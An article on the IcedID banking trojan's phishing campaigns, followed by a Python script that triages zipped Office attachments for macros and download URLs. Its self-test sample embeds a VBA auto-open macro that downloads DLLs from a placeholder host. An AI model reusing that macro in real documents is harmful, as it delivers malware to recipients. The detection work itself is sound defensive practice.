Cybersecurity researcher and Malware Hunter, JAMESWT: The link in the message points to a URL from which it downloads an exe: the malware.
CheckPoint: IcedID makes its debut “in style” in the top ten malware chart, coming straight into second place behind Dridex and before Lokibot
IcedID (aka BokBot) makes its debut “in style” in the top ten malware chart, coming straight in at second place behind Dridex and ahead of Lokibot, according to CheckPoint's cybersecurity experts. First seen in 2017, it spread rapidly in March through several spam campaigns, impacting 11% of organizations globally. Once installed, the banking trojan attempts to steal account details, payment credentials and other sensitive information from users' PCs. IcedID has also been used as the initial infection stage in ransomware operations, such as Egregor. BokBot, in short, is fast becoming a leading player in the global cybercrime landscape.
How the trojan is spread and what the targets are
The vehicles used to spread IcedID are phishing and spear-phishing emails that exploit real, stolen mail conversations (the reply lands inside a thread the victim actually took part in). They carry attachments compressed in zip format, some password protected and some not. Inside them are Office files (xlsm or doc have been detected so far) that contact one or more URLs (different in each message) to download the DLL and start the malware infection chain. BokBot, when it was first discovered, targeted financial institutions and banks in the United States, Canada and the United Kingdom. Now the attacks appear to have moved to Europe, and Italy appears to be one of the most affected countries.
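The chain described above (zip attachment, Office file inside, macro, download URL) is what a mail-gateway or SOC triage script has to unpack. The following is an added example, not code from the article or from CheckPoint: it builds a constructed sample attachment (an outer zip holding a macro-enabled workbook whose vbaProject.bin references two download URLs under the reserved `example.invalid` domain, stored in plain text for the demo) and then triages it with the Python standard library only. It flags password-protected zip entries via the zip general-purpose encryption bit, detects macros in both OOXML (vbaProject.bin part) and legacy OLE2 files (UTF-16LE `_VBA_PROJECT` stream name), and collects URLs while discarding the XML schema namespace URLs every OOXML file contains. Real VBA streams are MS-OVBA compressed, so on real samples the URL scan should be backed by a tool such as oletools' olevba; the `triage_attachment` and `inspect_office_file` names are this example's own.

```python
"""Triage of an IcedID-style mail attachment: zip -> Office file -> macro -> URL."""
import io
import re
import zipfile

OFFICE_EXTS = (".xlsm", ".xls", ".doc", ".docm")
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # OLE2 compound file header
# OOXML parts reference schema namespaces by URL; these are not download URLs.
BENIGN_URL_PREFIXES = (b"http://schemas.openxmlformats.org/",
                       b"http://schemas.microsoft.com/",
                       b"http://www.w3.org/",
                       b"http://purl.org/")
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#@!$&'()*+,;=%-]+")


def build_sample_attachment():
    """Constructed sample (not a real IcedID file): outer zip -> invoice_2021.xlsm
    (an OOXML zip) -> xl/vbaProject.bin holding plain-text VBA with two URLs."""
    vba = (b'Attribute VB_Name = "ThisWorkbook"\r\n'
           b"Private Sub Workbook_Open()\r\n"
           b'  URLDownloadToFile 0, "http://example.invalid/doc/a.dll", "C:\\Users\\Public\\a.dll", 0, 0\r\n'
           b'  URLDownloadToFile 0, "http://example.invalid/doc/b.dll", "C:\\Users\\Public\\b.dll", 0, 0\r\n'
           b"End Sub\r\n")
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/vbaProject.bin", vba)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("invoice_2021.xlsm", inner.getvalue())
    return outer.getvalue()


def find_urls(blob):
    """URLs in a byte blob, minus well-known XML namespace URIs."""
    return {u for u in URL_RE.findall(blob) if not u.startswith(BENIGN_URL_PREFIXES)}


def inspect_office_file(name, data):
    """Classify one extracted document and collect macro/URL indicators."""
    result = {"name": name, "format": "unknown", "has_macros": False, "urls": set()}
    if data.startswith(OLE_MAGIC):
        # Legacy binary .doc/.xls. Directory entry names are UTF-16LE, so a
        # "_VBA_PROJECT" stream is visible in the raw bytes. The VBA source is
        # MS-OVBA compressed, so the raw URL scan only sees uncompressed strings.
        result["format"] = "ole2"
        result["has_macros"] = "_VBA_PROJECT".encode("utf-16-le") in data
        result["urls"] = find_urls(data)
    elif zipfile.is_zipfile(io.BytesIO(data)):
        # OOXML (.xlsm/.docm) is a zip container; macros live in vbaProject.bin.
        result["format"] = "ooxml"
        with zipfile.ZipFile(io.BytesIO(data)) as doc:
            for part in doc.namelist():
                if part.lower().endswith("vbaproject.bin"):
                    result["has_macros"] = True
                result["urls"] |= find_urls(doc.read(part))
    return result


def triage_attachment(zip_bytes, password=None):
    """Walk the outer zip, inspect each Office member, return an indicator report.
    Zip general-purpose flag bit 0 marks an encrypted entry (the password-protected
    variant of the campaign); without the password, typically given in the mail
    body, the entry is reported but not opened."""
    report = {"encrypted": False, "office_files": [], "urls": set()}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for info in z.infolist():
            if info.flag_bits & 0x1:
                report["encrypted"] = True
                if password is None:
                    continue
            if not info.filename.lower().endswith(OFFICE_EXTS):
                continue
            data = z.read(info, pwd=password.encode() if password else None)
            doc = inspect_office_file(info.filename, data)
            report["office_files"].append(doc)
            report["urls"] |= doc["urls"]
    report["urls"] = sorted(u.decode("ascii", "replace") for u in report["urls"])
    report["suspicious"] = bool(report["urls"]) and any(d["has_macros"] for d in report["office_files"])
    return report


if __name__ == "__main__":
    rep = triage_attachment(build_sample_attachment())
    for doc in rep["office_files"]:
        print(f"{doc['name']}: format={doc['format']} macros={doc['has_macros']}")
    print("encrypted:", rep["encrypted"])
    print("download URLs:", rep["urls"])
    print("suspicious:", rep["suspicious"])
```

The `suspicious` verdict deliberately requires both a macro and a non-namespace URL, which is the shape of the chain described above; an encrypted entry with no password is still surfaced through `encrypted` so the analyst knows to fish the password out of the message body before re-running with `password=`.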